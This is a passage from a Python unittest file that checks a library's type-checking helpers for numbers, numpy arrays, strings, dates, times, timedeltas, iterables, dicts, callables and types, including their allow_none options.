self.assertTrue(checks.is_some_int(3))
self.assertFalse(checks.is_some_int(3.5))
self.assertTrue(checks.is_some_int(np.uint64(3)))
self.assertFalse(checks.is_some_int(None))
self.assertTrue(checks.is_some_int(None, allow_none=True))
self.assertFalse(checks.is_some_int('hi'))
checks.check_some_int(3)
with self.assertRaises(AssertionError):
checks.check_some_int(3.5)
checks.check_some_int(np.int64(3))
checks.check_some_int(np.uint64(3))
with self.assertRaises(AssertionError):
checks.check_some_int(None)
checks.check_some_int(None, allow_none=True)
with self.assertRaises(AssertionError):
checks.check_some_int('hi')
def test_floats(self):
import numpy as np
self.assertFalse(checks.is_float(3))
self.assertTrue(checks.is_float(3.5))
# NB! The following is true (is that right?):
self.assertTrue(checks.is_float(np.float64(3.5)))
# NB! The following is true (is that right?):
self.assertTrue(checks.is_float(np.double(3.5)))
self.assertFalse(checks.is_float(None))
self.assertTrue(checks.is_float(None, allow_none=True))
self.assertFalse(checks.is_float('hi'))
with self.assertRaises(AssertionError):
checks.check_float(3)
checks.check_float(3.5)
checks.check_float(np.float64(3.5))
checks.check_float(np.double(3.5))
with self.assertRaises(AssertionError):
checks.check_float(None)
checks.check_float(None, allow_none=True)
with self.assertRaises(AssertionError):
checks.check_float('hi')
self.assertFalse(checks.is_some_numpy_float(3))
self.assertFalse(checks.is_some_numpy_float(3.5))
self.assertTrue(checks.is_some_numpy_float(np.float64(3.5)))
# NB! The following is true (is that right?):
self.assertTrue(checks.is_some_numpy_float(np.double(3.5)))
self.assertFalse(checks.is_some_numpy_float(None))
self.assertTrue(checks.is_some_numpy_float(None, allow_none=True))
self.assertFalse(checks.is_some_numpy_float('hi'))
with self.assertRaises(AssertionError):
checks.check_some_numpy_float(3)
with self.assertRaises(AssertionError):
checks.check_some_numpy_float(3.5)
checks.check_some_numpy_float(np.float64(3.5))
checks.check_some_numpy_float(np.double(3.5))
with self.assertRaises(AssertionError):
checks.check_some_numpy_float(None)
checks.check_some_numpy_float(None, allow_none=True)
with self.assertRaises(AssertionError):
checks.check_some_numpy_float('hi')
self.assertFalse(checks.is_some_numpy_double(3))
self.assertFalse(checks.is_some_numpy_double(3.5))
# NB! The following is true (is that right?):
self.assertTrue(checks.is_some_numpy_double(np.float64(3.5)))
self.assertTrue(checks.is_some_numpy_double(np.double(3.5)))
self.assertFalse(checks.is_some_numpy_double(None))
self.assertTrue(checks.is_some_numpy_double(None, allow_none=True))
self.assertFalse(checks.is_some_numpy_double('hi'))
with self.assertRaises(AssertionError):
checks.check_some_numpy_double(3)
with self.assertRaises(AssertionError):
checks.check_some_numpy_double(3.5)
checks.check_some_numpy_double(np.float64(3.5))
checks.check_some_numpy_double(np.double(3.5))
with self.assertRaises(AssertionError):
checks.check_some_numpy_double(None)
checks.check_some_numpy_double(None, allow_none=True)
with self.assertRaises(AssertionError):
checks.check_some_numpy_double('hi')
self.assertFalse(checks.is_some_float(3))
self.assertTrue(checks.is_some_float(3.5))
self.assertTrue(checks.is_some_float(np.float64(3.5)))
self.assertTrue(checks.is_some_float(np.double(3.5)))
self.assertFalse(checks.is_some_float(None))
self.assertTrue(checks.is_some_float(None, allow_none=True))
self.assertFalse(checks.is_some_float('hi'))
with self.assertRaises(AssertionError):
checks.check_some_float(3)
checks.check_some_float(3.5)
checks.check_some_float(np.float64(3.5))
checks.check_some_float(np.double(3.5))
with self.assertRaises(AssertionError):
checks.check_some_float(None)
checks.check_some_float(None, allow_none=True)
with self.assertRaises(AssertionError):
checks.check_some_float('hi')
def test_numbers(self):
import numpy as np
self.assertTrue(checks.is_some_number(3))
self.assertTrue(checks.is_some_number(3.5))
self.assertTrue(checks.is_some_number(np.int64(3)))
self.assertTrue(checks.is_some_number(np.float64(3.5)))
self.assertTrue(checks.is_some_number(np.double(3.5)))
self.assertFalse(checks.is_some_number(None))
self.assertTrue(checks.is_some_number(None, allow_none=True))
self.assertFalse(checks.is_some_number('hi'))
checks.check_some_number(3)
checks.check_some_number(3.5)
checks.check_some_number(np.float64(3.5))
checks.check_some_number(np.double(3.5))
with self.assertRaises(AssertionError):
checks.check_some_number(None)
checks.check_some_number(None, allow_none=True)
with self.assertRaises(AssertionError):
checks.check_some_number('hi')
def test_numpy_arrays(self):
import numpy as np
self.assertTrue(checks.is_numpy_array(np.array([1, 2, 3])))
self.assertTrue(checks.is_numpy_array(np.array([[1, 2, 3], [1, 2, 3]])))
self.assertTrue(checks.is_numpy_array(np.array(3)))
self.assertFalse(checks.is_numpy_array([1, 2, 3]))
self.assertFalse(checks.is_numpy_array(3))
self.assertFalse(checks.is_numpy_array(np.int64(3)))
self.assertFalse(checks.is_numpy_array(3.5))
self.assertFalse(checks.is_numpy_array(np.float64(3.5)))
self.assertFalse(checks.is_numpy_array('hi'))
self.assertFalse(checks.is_numpy_array(None))
self.assertTrue(checks.is_numpy_array(None, allow_none=True))
checks.check_numpy_array(np.array([1, 2, 3]))
checks.check_numpy_array(np.array([[1, 2, 3], [1, 2, 3]]))
checks.check_numpy_array(np.array(3))
with self.assertRaises(AssertionError):
checks.check_numpy_array([1, 2, 3])
with self.assertRaises(AssertionError):
checks.check_numpy_array(3)
with self.assertRaises(AssertionError):
checks.check_numpy_array(np.int64(3))
with self.assertRaises(AssertionError):
checks.check_numpy_array(3.5)
with self.assertRaises(AssertionError):
checks.check_numpy_array(np.float64(3.5))
with self.assertRaises(AssertionError):
checks.check_numpy_array('hi')
with self.assertRaises(AssertionError):
checks.check_numpy_array(None)
checks.check_numpy_array(None, allow_none=True)
def test_strings(self):
self.assertFalse(checks.is_string([1, 2, 3]))
self.assertFalse(checks.is_string(3))
self.assertFalse(checks.is_string(3.5))
self.assertTrue(checks.is_string('hi'))
self.assertTrue(checks.is_string("hi"))
self.assertTrue(checks.is_string("""hi"""))
self.assertFalse(checks.is_string(None))
self.assertTrue(checks.is_string(None, allow_none=True))
with self.assertRaises(AssertionError):
checks.check_string([1, 2, 3])
with self.assertRaises(AssertionError):
checks.check_string(3)
with self.assertRaises(AssertionError):
checks.check_string(3.5)
checks.check_string('hi')
checks.check_string("hi")
checks.check_string("""hi""")
with self.assertRaises(AssertionError):
checks.check_string(None)
checks.check_string(None, allow_none=True)
def test_dates(self):
import datetime as dt
import numpy as np
import pandas as pd
self.assertFalse(checks.is_date([1, 2, 3]))
self.assertFalse(checks.is_date(3))
self.assertFalse(checks.is_date(3.5))
self.assertFalse(checks.is_date('hi'))
self.assertFalse(checks.is_date("hi"))
self.assertFalse(checks.is_date("""hi"""))
self.assertTrue(checks.is_date(dt.date(2019, 9, 10)))
self.assertFalse(checks.is_date(dt.time(12, 3)))
self.assertFalse(checks.is_date(dt.datetime(2019, 9, 10, 12, 3)))
self.assertFalse(checks.is_date(dt.timedelta(seconds=5)))
self.assertFalse(checks.is_date(np.timedelta64(5, 's')))
self.assertFalse(checks.is_date(pd.Timedelta(5, 's')))
self.assertFalse(checks.is_date(None))
self.assertTrue(checks.is_date(None, allow_none=True))
with self.assertRaises(AssertionError):
checks.check_date([1, 2, 3])
with self.assertRaises(AssertionError):
checks.check_date(3)
with self.assertRaises(AssertionError):
checks.check_date(3.5)
with self.assertRaises(AssertionError):
checks.check_date('hi')
with self.assertRaises(AssertionError):
checks.check_date("hi")
with self.assertRaises(AssertionError):
checks.check_date("""hi""")
checks.check_date(dt.date(2019, 9, 10))
with self.assertRaises(AssertionError):
checks.check_date(dt.time(12, 3))
with self.assertRaises(AssertionError):
checks.check_date(dt.datetime(2019, 9, 10, 12, 3))
with self.assertRaises(AssertionError):
checks.check_date(dt.timedelta(seconds=5))
with self.assertRaises(AssertionError):
checks.check_date(np.timedelta64(5, 's'))
with self.assertRaises(AssertionError):
checks.check_date(pd.Timedelta(5, 's'))
with self.assertRaises(AssertionError):
checks.check_date(None)
checks.check_date(None, allow_none=True)
self.assertFalse(checks.is_some_date([1, 2, 3]))
self.assertFalse(checks.is_some_date(3))
self.assertFalse(checks.is_some_date(3.5))
self.assertFalse(checks.is_some_date('hi'))
self.assertFalse(checks.is_some_date("hi"))
self.assertFalse(checks.is_some_date("""hi"""))
self.assertTrue(checks.is_some_date(dt.date(2019, 9, 10)))
self.assertFalse(checks.is_some_date(dt.time(12, 3)))
self.assertFalse(checks.is_some_date(dt.datetime(2019, 9, 10, 12, 3)))
self.assertFalse(checks.is_some_date(dt.timedelta(seconds=5)))
self.assertFalse(checks.is_some_date(np.timedelta64(5, 's')))
self.assertFalse(checks.is_some_date(pd.Timedelta(5, 's')))
self.assertFalse(checks.is_some_date(None))
self.assertTrue(checks.is_some_date(None, allow_none=True))
with self.assertRaises(AssertionError):
checks.check_some_date([1, 2, 3])
with self.assertRaises(AssertionError):
checks.check_some_date(3)
with self.assertRaises(AssertionError):
checks.check_some_date(3.5)
with self.assertRaises(AssertionError):
checks.check_some_date('hi')
with self.assertRaises(AssertionError):
checks.check_some_date("hi")
with self.assertRaises(AssertionError):
checks.check_some_date("""hi""")
checks.check_some_date(dt.date(2019, 9, 10))
with self.assertRaises(AssertionError):
checks.check_some_date(dt.time(12, 3))
with self.assertRaises(AssertionError):
checks.check_some_date(dt.datetime(2019, 9, 10, 12, 3))
with self.assertRaises(AssertionError):
checks.check_some_date(dt.timedelta(seconds=5))
with self.assertRaises(AssertionError):
checks.check_some_date(np.timedelta64(5, 's'))
with self.assertRaises(AssertionError):
checks.check_some_date(pd.Timedelta(5, 's'))
with self.assertRaises(AssertionError):
checks.check_some_date(None)
checks.check_some_date(None, allow_none=True)
def test_times(self):
import datetime as dt
import numpy as np
import pandas as pd
self.assertFalse(checks.is_time([1, 2, 3]))
self.assertFalse(checks.is_time(3))
self.assertFalse(checks.is_time(3.5))
self.assertFalse(checks.is_time('hi'))
self.assertFalse(checks.is_time("hi"))
self.assertFalse(checks.is_time("""hi"""))
self.assertFalse(checks.is_time(dt.date(2019, 9, 10)))
self.assertTrue(checks.is_time(dt.time(12, 3)))
self.assertFalse(checks.is_time(dt.datetime(2019, 9, 10, 12, 3)))
self.assertFalse(checks.is_time(dt.timedelta(seconds=5)))
self.assertFalse(checks.is_time(np.timedelta64(5, 's')))
self.assertFalse(checks.is_time(pd.Timedelta(5, 's')))
self.assertFalse(checks.is_time(None))
self.assertTrue(checks.is_time(None, allow_none=True))
with self.assertRaises(AssertionError):
checks.check_time([1, 2, 3])
with self.assertRaises(AssertionError):
checks.check_time(3)
with self.assertRaises(AssertionError):
checks.check_time(3.5)
with self.assertRaises(AssertionError):
checks.check_time('hi')
with self.assertRaises(AssertionError):
checks.check_time("hi")
with self.assertRaises(AssertionError):
checks.check_time("""hi""")
with self.assertRaises(AssertionError):
checks.check_time(dt.date(2019, 9, 10))
checks.check_time(dt.time(12, 3))
with self.assertRaises(AssertionError):
checks.check_time(dt.datetime(2019, 9, 10, 12, 3))
with self.assertRaises(AssertionError):
checks.check_time(dt.timedelta(seconds=5))
with self.assertRaises(AssertionError):
checks.check_time(np.timedelta64(5, 's'))
with self.assertRaises(AssertionError):
checks.check_time(pd.Timedelta(5, 's'))
with self.assertRaises(AssertionError):
checks.check_time(None)
checks.check_time(None, allow_none=True)
self.assertFalse(checks.is_some_time([1, 2, 3]))
self.assertFalse(checks.is_some_time(3))
self.assertFalse(checks.is_some_time(3.5))
self.assertFalse(checks.is_some_time('hi'))
self.assertFalse(checks.is_some_time("hi"))
self.assertFalse(checks.is_some_time("""hi"""))
self.assertFalse(checks.is_some_time(dt.date(2019, 9, 10)))
self.assertTrue(checks.is_some_time(dt.time(12, 3)))
self.assertFalse(checks.is_some_time(dt.datetime(2019, 9, 10, 12, 3)))
self.assertFalse(checks.is_some_time(dt.timedelta(seconds=5)))
self.assertFalse(checks.is_some_time(None))
self.assertTrue(checks.is_some_time(None, allow_none=True))
with self.assertRaises(AssertionError):
checks.check_some_time([1, 2, 3])
with self.assertRaises(AssertionError):
checks.check_some_time(3)
with self.assertRaises(AssertionError):
checks.check_some_time(3.5)
with self.assertRaises(AssertionError):
checks.check_some_time('hi')
with self.assertRaises(AssertionError):
checks.check_some_time("hi")
with self.assertRaises(AssertionError):
checks.check_some_time("""hi""")
with self.assertRaises(AssertionError):
checks.check_some_time(dt.date(2019, 9, 10))
checks.check_some_time(dt.time(12, 3))
with self.assertRaises(AssertionError):
checks.check_some_time(dt.datetime(2019, 9, 10, 12, 3))
with self.assertRaises(AssertionError):
checks.check_some_time(dt.timedelta(seconds=5))
with self.assertRaises(AssertionError):
checks.check_some_time(np.timedelta64(5, 's'))
with self.assertRaises(AssertionError):
checks.check_some_time(pd.Timedelta(5, 's'))
with self.assertRaises(AssertionError):
checks.check_some_time(None)
checks.check_some_time(None, allow_none=True)
def test_datetimes(self):
import datetime as dt
import numpy as np
import pandas as pd
self.assertFalse(checks.is_datetime([1, 2, 3]))
self.assertFalse(checks.is_datetime(3))
self.assertFalse(checks.is_datetime(3.5))
self.assertFalse(checks.is_datetime('hi'))
self.assertFalse(checks.is_datetime("hi"))
self.assertFalse(checks.is_datetime("""hi"""))
self.assertFalse(checks.is_datetime(dt.date(2019, 9, 10)))
self.assertFalse(checks.is_datetime(dt.time(12, 3)))
self.assertTrue(checks.is_datetime(dt.datetime(2019, 9, 10, 12, 3)))
self.assertFalse(checks.is_datetime(dt.timedelta(seconds=5)))
self.assertFalse(checks.is_datetime(np.timedelta64(5, 's')))
self.assertFalse(checks.is_datetime(pd.Timedelta(5, 's')))
self.assertFalse(checks.is_datetime(None))
self.assertTrue(checks.is_datetime(None, allow_none=True))
with self.assertRaises(AssertionError):
checks.check_datetime([1, 2, 3])
with self.assertRaises(AssertionError):
checks.check_datetime(3)
with self.assertRaises(AssertionError):
checks.check_datetime(3.5)
with self.assertRaises(AssertionError):
checks.check_datetime('hi')
with self.assertRaises(AssertionError):
checks.check_datetime("hi")
with self.assertRaises(AssertionError):
checks.check_datetime("""hi""")
with self.assertRaises(AssertionError):
checks.check_datetime(dt.date(2019, 9, 10))
with self.assertRaises(AssertionError):
checks.check_datetime(dt.time(12, 3))
checks.check_datetime(dt.datetime(2019, 9, 10, 12, 3))
with self.assertRaises(AssertionError):
checks.check_datetime(dt.timedelta(seconds=5))
with self.assertRaises(AssertionError):
checks.check_datetime(np.timedelta64(5, 's'))
with self.assertRaises(AssertionError):
checks.check_datetime(pd.Timedelta(5, 's'))
with self.assertRaises(AssertionError):
checks.check_datetime(None)
checks.check_datetime(None, allow_none=True)
self.assertFalse(checks.is_some_datetime([1, 2, 3]))
self.assertFalse(checks.is_some_datetime(3))
self.assertFalse(checks.is_some_datetime(3.5))
self.assertFalse(checks.is_some_datetime('hi'))
self.assertFalse(checks.is_some_datetime("hi"))
self.assertFalse(checks.is_some_datetime("""hi"""))
self.assertFalse(checks.is_some_datetime(dt.date(2019, 9, 10)))
self.assertFalse(checks.is_some_datetime(dt.time(12, 3)))
self.assertTrue(checks.is_some_datetime(dt.datetime(2019, 9, 10, 12, 3)))
self.assertFalse(checks.is_some_datetime(dt.timedelta(seconds=5)))
self.assertFalse(checks.is_some_datetime(None))
self.assertTrue(checks.is_some_datetime(None, allow_none=True))
with self.assertRaises(AssertionError):
checks.check_some_datetime([1, 2, 3])
with self.assertRaises(AssertionError):
checks.check_some_datetime(3)
with self.assertRaises(AssertionError):
checks.check_some_datetime(3.5)
with self.assertRaises(AssertionError):
checks.check_some_datetime('hi')
with self.assertRaises(AssertionError):
checks.check_some_datetime("hi")
with self.assertRaises(AssertionError):
checks.check_some_datetime("""hi""")
with self.assertRaises(AssertionError):
checks.check_some_datetime(dt.date(2019, 9, 10))
with self.assertRaises(AssertionError):
checks.check_some_datetime(dt.time(12, 3))
checks.check_some_datetime(dt.datetime(2019, 9, 10, 12, 3))
with self.assertRaises(AssertionError):
checks.check_some_datetime(dt.timedelta(seconds=5))
with self.assertRaises(AssertionError):
checks.check_some_datetime(np.timedelta64(5, 's'))
with self.assertRaises(AssertionError):
checks.check_some_datetime(pd.Timedelta(5, 's'))
with self.assertRaises(AssertionError):
checks.check_some_datetime(None)
checks.check_some_datetime(None, allow_none=True)
def test_timedeltas(self):
import datetime as dt
import numpy as np
import pandas as pd
self.assertFalse(checks.is_timedelta([1, 2, 3]))
self.assertFalse(checks.is_timedelta(3))
self.assertFalse(checks.is_timedelta(3.5))
self.assertFalse(checks.is_timedelta('hi'))
self.assertFalse(checks.is_timedelta("hi"))
self.assertFalse(checks.is_timedelta("""hi"""))
self.assertFalse(checks.is_timedelta(dt.date(2019, 9, 10)))
self.assertFalse(checks.is_timedelta(dt.time(12, 3)))
self.assertFalse(checks.is_timedelta(dt.datetime(2019, 9, 10, 12, 3)))
self.assertTrue(checks.is_timedelta(dt.timedelta(seconds=5)))
self.assertFalse(checks.is_timedelta(np.timedelta64(5, 's')))
# NB! Note that the following is true:
self.assertTrue(checks.is_timedelta(pd.Timedelta(5, 's')))
self.assertFalse(checks.is_timedelta(None))
self.assertTrue(checks.is_timedelta(None, allow_none=True))
with self.assertRaises(AssertionError):
checks.check_timedelta([1, 2, 3])
with self.assertRaises(AssertionError):
checks.check_timedelta(3)
with self.assertRaises(AssertionError):
checks.check_timedelta(3.5)
with self.assertRaises(AssertionError):
checks.check_timedelta('hi')
with self.assertRaises(AssertionError):
checks.check_timedelta("hi")
with self.assertRaises(AssertionError):
checks.check_timedelta("""hi""")
with self.assertRaises(AssertionError):
checks.check_timedelta(dt.date(2019, 9, 10))
with self.assertRaises(AssertionError):
checks.check_timedelta(dt.time(12, 3))
with self.assertRaises(AssertionError):
checks.check_timedelta(dt.datetime(2019, 9, 10, 12, 3))
checks.check_timedelta(dt.timedelta(seconds=5))
with self.assertRaises(AssertionError):
checks.check_timedelta(np.timedelta64(5, 's'))
# NB! Note that the following holds:
checks.check_timedelta(pd.Timedelta(5, 's'))
with self.assertRaises(AssertionError):
checks.check_timedelta(None)
checks.check_timedelta(None, allow_none=True)
self.assertFalse(checks.is_some_timedelta([1, 2, 3]))
self.assertFalse(checks.is_some_timedelta(3))
self.assertFalse(checks.is_some_timedelta(3.5))
self.assertFalse(checks.is_some_timedelta('hi'))
self.assertFalse(checks.is_some_timedelta("hi"))
self.assertFalse(checks.is_some_timedelta("""hi"""))
self.assertFalse(checks.is_some_timedelta(dt.date(2019, 9, 10)))
self.assertFalse(checks.is_some_timedelta(dt.time(12, 3)))
self.assertFalse(checks.is_some_timedelta(dt.datetime(2019, 9, 10, 12, 3)))
self.assertTrue(checks.is_some_timedelta(dt.timedelta(seconds=5)))
self.assertTrue(checks.is_some_timedelta(np.timedelta64(5, 's')))
self.assertTrue(checks.is_some_timedelta(pd.Timedelta(5, 's')))
self.assertFalse(checks.is_some_timedelta(None))
self.assertTrue(checks.is_some_timedelta(None, allow_none=True))
with self.assertRaises(AssertionError):
checks.check_some_timedelta([1, 2, 3])
with self.assertRaises(AssertionError):
checks.check_some_timedelta(3)
with self.assertRaises(AssertionError):
checks.check_some_timedelta(3.5)
with self.assertRaises(AssertionError):
checks.check_some_timedelta('hi')
with self.assertRaises(AssertionError):
checks.check_some_timedelta("hi")
with self.assertRaises(AssertionError):
checks.check_some_timedelta("""hi""")
with self.assertRaises(AssertionError):
checks.check_some_timedelta(dt.date(2019, 9, 10))
with self.assertRaises(AssertionError):
checks.check_some_timedelta(dt.time(12, 3))
with self.assertRaises(AssertionError):
checks.check_some_timedelta(dt.datetime(2019, 9, 10, 12, 3))
checks.check_some_timedelta(dt.timedelta(seconds=5))
checks.check_some_timedelta(np.timedelta64(5, 's'))
checks.check_some_timedelta(pd.Timedelta(5, 's'))
with self.assertRaises(AssertionError):
checks.check_some_timedelta(None)
checks.check_some_timedelta(None, allow_none=True)
def test_iterables(self):
import numpy as np
self.assertFalse(checks.is_iterable(3))
self.assertFalse(checks.is_iterable(3.5))
self.assertTrue(checks.is_iterable('hi'))
self.assertTrue(checks.is_iterable([1, 2, 3]))
self.assertTrue(checks.is_iterable([[1, 2, 3], [1, 2, 3]]))
self.assertTrue(checks.is_iterable(np.array([1, 2, 3])))
self.assertTrue(checks.is_iterable(np.array([[1, 2, 3], [1, 2, 3]])))
self.assertTrue(checks.is_iterable({'name': 'Paul', 'surname': 'Bilokon'}))
self.assertFalse(checks.is_iterable(None))
self.assertTrue(checks.is_iterable(None, allow_none=True))
with self.assertRaises(AssertionError):
checks.check_iterable(3)
with self.assertRaises(AssertionError):
checks.check_iterable(3.5)
checks.check_iterable('hi')
checks.check_iterable([1, 2, 3])
checks.check_iterable([[1, 2, 3], [1, 2, 3]])
checks.check_iterable(np.array([1, 2, 3]))
checks.check_iterable(np.array([[1, 2, 3], [1, 2, 3]]))
checks.check_iterable({'name': 'Paul', 'surname': 'Bilokon'})
with self.assertRaises(AssertionError):
checks.check_iterable(None)
checks.check_iterable(None, allow_none=True)
self.assertFalse(checks.is_iterable_not_string(3))
self.assertFalse(checks.is_iterable_not_string(3.5))
self.assertFalse(checks.is_iterable_not_string('hi'))
self.assertTrue(checks.is_iterable_not_string([1, 2, 3]))
self.assertTrue(checks.is_iterable_not_string([[1, 2, 3], [1, 2, 3]]))
self.assertTrue(checks.is_iterable_not_string(np.array([1, 2, 3])))
self.assertTrue(checks.is_iterable_not_string(np.array([[1, 2, 3], [1, 2, 3]])))
self.assertTrue(checks.is_iterable_not_string({'name': 'Paul', 'surname': 'Bilokon'}))
self.assertFalse(checks.is_iterable_not_string(None))
self.assertTrue(checks.is_iterable_not_string(None, allow_none=True))
with self.assertRaises(AssertionError):
checks.check_iterable_not_string(3)
with self.assertRaises(AssertionError):
checks.check_iterable_not_string(3.5)
with self.assertRaises(AssertionError):
checks.check_iterable_not_string('hi')
checks.check_iterable_not_string([1, 2, 3])
checks.check_iterable_not_string([[1, 2, 3], [1, 2, 3]])
checks.check_iterable_not_string(np.array([1, 2, 3]))
checks.check_iterable_not_string(np.array([[1, 2, 3], [1, 2, 3]]))
checks.check_iterable_not_string({'name': 'Paul', 'surname': 'Bilokon'})
with self.assertRaises(AssertionError):
checks.check_iterable_not_string(None)
checks.check_iterable_not_string(None, allow_none=True)
result, iterable = checks.is_iterable_over_instances(3, int)
self.assertFalse(result)
self.assertEqual(iterable, 3)
result, iterable = checks.is_iterable_over_instances(3.5, float)
self.assertFalse(result)
self.assertEqual(iterable, 3.5)
result, iterable = checks.is_iterable_over_instances('hi', str)
self.assertTrue(result)
self.assertEqual(list(iterable), ['h', 'i'])
result, iterable = checks.is_iterable_over_instances([1, 2, 3], int)
self.assertTrue(result)
self.assertEqual(list(iterable), [1, 2, 3])
result, iterable = checks.is_iterable_over_instances([[1, 2, 3], [1, 2, 3]], list)
self.assertTrue(result)
self.assertEqual(list(iterable), [[1, 2, 3], [1, 2, 3]])
result, iterable = checks.is_iterable_over_instances(np.array([1, 2, 3]), np.int32)
self.assertTrue(result)
self.assertEqual(list(iterable), [1, 2, 3])
# NB! In this case the iterable that was passed in does not quite match the returned iterable
result, _ = checks.is_iterable_over_instances(np.array([[1, 2, 3], [1, 2, 3]]), np.ndarray)
self.assertTrue(result)
result, iterable = checks.is_iterable_over_instances({'name': 'Paul', 'surname': 'Bilokon'}, str)
self.assertTrue(result)
self.assertEqual(list(iterable), ['name', 'surname'])
result, iterable = checks.is_iterable_over_instances([], int)
self.assertFalse(result)
result, iterable = checks.is_iterable_over_instances([], int, allow_empty=True)
self.assertTrue(result)
result, iterable = checks.is_iterable_over_instances(None, int)
self.assertFalse(result)
self.assertTrue(iterable is None)
result, iterable = checks.is_iterable_over_instances(None, int, allow_none=True)
self.assertTrue(result)
self.assertTrue(iterable is None)
with self.assertRaises(AssertionError):
checks.check_iterable_over_instances(3, int)
with self.assertRaises(AssertionError):
checks.check_iterable_over_instances(3.5, float)
iterable = checks.check_iterable_over_instances('hi', str)
self.assertEqual(list(iterable), ['h', 'i'])
iterable = checks.check_iterable_over_instances([1, 2, 3], int)
self.assertEqual(list(iterable), [1, 2, 3])
iterable = checks.check_iterable_over_instances([[1, 2, 3], [1, 2, 3]], list)
self.assertEqual(list(iterable), [[1, 2, 3], [1, 2, 3]])
iterable = checks.check_iterable_over_instances(np.array([1, 2, 3]), np.int32)
self.assertEqual(list(iterable), [1, 2, 3])
# NB! In this case the iterable that was passed in does not quite match the returned iterable
_ = checks.check_iterable_over_instances(np.array([[1, 2, 3], [1, 2, 3]]), np.ndarray)
iterable = checks.check_iterable_over_instances({'name': 'Paul', 'surname': 'Bilokon'}, str)
self.assertEqual(list(iterable), ['name', 'surname'])
with self.assertRaises(AssertionError):
checks.check_iterable_over_instances([], int)
iterable = checks.check_iterable_over_instances([], int, allow_empty=True)
with self.assertRaises(AssertionError):
checks.check_iterable_over_instances(None, int)
iterable = checks.check_iterable_over_instances(None, int, allow_none=True)
self.assertTrue(iterable is None)
def test_dicts(self):
import collections as col
import numpy as np
self.assertFalse(checks.is_dict(3))
self.assertFalse(checks.is_dict(3.5))
self.assertFalse(checks.is_dict('hi'))
self.assertFalse(checks.is_dict([1, 2, 3]))
self.assertFalse(checks.is_dict([[1, 2, 3], [1, 2, 3]]))
self.assertFalse(checks.is_dict(np.array([1, 2, 3])))
self.assertFalse(checks.is_dict(np.array([[1, 2, 3], [1, 2, 3]])))
self.assertTrue(checks.is_dict({'name': 'Paul', 'surname': 'Bilokon'}))
self.assertTrue(checks.is_dict(col.OrderedDict((('name', 'Paul'), ('surname', 'Bilokon')))))
self.assertFalse(checks.is_dict(None))
self.assertTrue(checks.is_dict(None, allow_none=True))
with self.assertRaises(AssertionError):
checks.check_dict(3)
with self.assertRaises(AssertionError):
checks.check_dict(3.5)
with self.assertRaises(AssertionError):
checks.check_dict('hi')
with self.assertRaises(AssertionError):
checks.check_dict([1, 2, 3])
with self.assertRaises(AssertionError):
checks.check_dict([[1, 2, 3], [1, 2, 3]])
with self.assertRaises(AssertionError):
checks.check_dict(np.array([1, 2, 3]))
with self.assertRaises(AssertionError):
checks.check_dict(np.array([[1, 2, 3], [1, 2, 3]]))
checks.check_dict({'name': 'Paul', 'surname': 'Bilokon'})
checks.check_dict(col.OrderedDict((('name', 'Paul'), ('surname', 'Bilokon'))))
with self.assertRaises(AssertionError):
checks.check_dict(None)
checks.check_dict(None, allow_none=True)
self.assertFalse(checks.is_some_dict(3))
self.assertFalse(checks.is_some_dict(3.5))
self.assertFalse(checks.is_some_dict('hi'))
self.assertFalse(checks.is_some_dict([1, 2, 3]))
self.assertFalse(checks.is_some_dict([[1, 2, 3], [1, 2, 3]]))
self.assertFalse(checks.is_some_dict(np.array([1, 2, 3])))
self.assertFalse(checks.is_some_dict(np.array([[1, 2, 3], [1, 2, 3]])))
self.assertTrue(checks.is_some_dict({'name': 'Paul', 'surname': 'Bilokon'}))
self.assertTrue(checks.is_some_dict(col.OrderedDict((('name', 'Paul'), ('surname', 'Bilokon')))))
self.assertFalse(checks.is_some_dict(None))
self.assertTrue(checks.is_some_dict(None, allow_none=True))
with self.assertRaises(AssertionError):
checks.check_some_dict(3)
with self.assertRaises(AssertionError):
checks.check_some_dict(3.5)
with self.assertRaises(AssertionError):
checks.check_some_dict('hi')
with self.assertRaises(AssertionError):
checks.check_some_dict([1, 2, 3])
with self.assertRaises(AssertionError):
checks.check_some_dict([[1, 2, 3], [1, 2, 3]])
with self.assertRaises(AssertionError):
checks.check_some_dict(np.array([1, 2, 3]))
with self.assertRaises(AssertionError):
checks.check_some_dict(np.array([[1, 2, 3], [1, 2, 3]]))
checks.check_some_dict({'name': 'Paul', 'surname': 'Bilokon'})
checks.check_some_dict(col.OrderedDict((('name', 'Paul'), ('surname', 'Bilokon'))))
with self.assertRaises(AssertionError):
checks.check_some_dict(None)
checks.check_some_dict(None, allow_none=True)
def test_callables(self):
import numpy as np
self.assertFalse(checks.is_callable(3))
self.assertFalse(checks.is_callable(3.5))
self.assertFalse(checks.is_callable('hi'))
self.assertFalse(checks.is_callable([1, 2, 3]))
self.assertFalse(checks.is_callable([[1, 2, 3], [1, 2, 3]]))
self.assertFalse(checks.is_callable(np.array([1, 2, 3])))
self.assertFalse(checks.is_callable(np.array([[1, 2, 3], [1, 2, 3]])))
self.assertFalse(checks.is_callable({'name': 'Paul', 'surname': 'Bilokon'}))
def my_func():
return 123
self.assertTrue(checks.is_callable(my_func))
self.assertTrue(checks.is_callable(lambda x, y: x + y))
self.assertFalse(checks.is_callable(None))
self.assertTrue(checks.is_callable(None, allow_none=True))
with self.assertRaises(AssertionError):
checks.check_callable(3)
with self.assertRaises(AssertionError):
checks.check_callable(3.5)
with self.assertRaises(AssertionError):
checks.check_callable('hi')
with self.assertRaises(AssertionError):
checks.check_callable([1, 2, 3])
with self.assertRaises(AssertionError):
checks.check_callable([[1, 2, 3], [1, 2, 3]])
with self.assertRaises(AssertionError):
checks.check_callable(np.array([1, 2, 3]))
with self.assertRaises(AssertionError):
checks.check_callable(np.array([[1, 2, 3], [1, 2, 3]]))
with self.assertRaises(AssertionError):
checks.check_callable({'name': 'Paul', 'surname': 'Bilokon'})
def my_func1():
return 123
checks.check_callable(my_func1)
checks.check_callable(lambda x, y: x + y)
with self.assertRaises(AssertionError):
checks.check_callable(None)
checks.check_callable(None, allow_none=True)
def test_type(self):
import numpy as np
self.assertFalse(checks.is_type(3))
self.assertFalse(checks.is_type('hi'))
self.assertFalse(checks.is_type([1, 2, 3]))
self.assertTrue(checks.is_type(int))
self.assertTrue(checks.is_type(np.ndarray))
self.assertFalse(checks.is_type(None))
self.assertTrue(checks.is_type(None, allow_none=True))
with self.assertRaises(AssertionError):
checks.check_type(3)
with self.assertRaises(AssertionError):
checks.check_type('hi')
with self.assertRaises(AssertionError):
checks.check_type([1, 2, 3])
checks.check_type(int)
checks.check_type(np.ndarray)
with self.assertRaises(AssertionError):
checks.check_type(None)
checks.check_type(None, allow_none=True)
if __name__ == '__main__':
unittest.main()
| 49.10579
